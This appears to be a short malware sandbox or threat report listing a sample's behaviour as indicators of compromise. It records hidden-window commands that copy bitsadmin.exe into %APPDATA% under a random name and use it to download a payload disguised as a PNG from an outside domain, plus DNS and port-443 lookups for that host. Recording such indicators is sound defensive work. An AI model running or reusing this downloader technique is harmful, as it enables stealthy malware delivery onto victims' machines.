Technical Information
- '%APPDATA%\ejfxhxas.exe' /transfer jXoMMa /download https://chaeonfire.com/911fire/01693730226/gstatic.png %APPDATA%\gstatic.png
- %APPDATA%\ejfxhxas.exe
- 'ch###nfire.com':443
- DNS ASK ch###nfire.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\EjfxhXas.exe' (with hidden window)
- '%APPDATA%\ejfxhxas.exe' /transfer jXoMMa /download https://chaeonfire.com/911fire/01693730226/gstatic.png %APPDATA%\gstatic.png' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\EjfxhXas.exe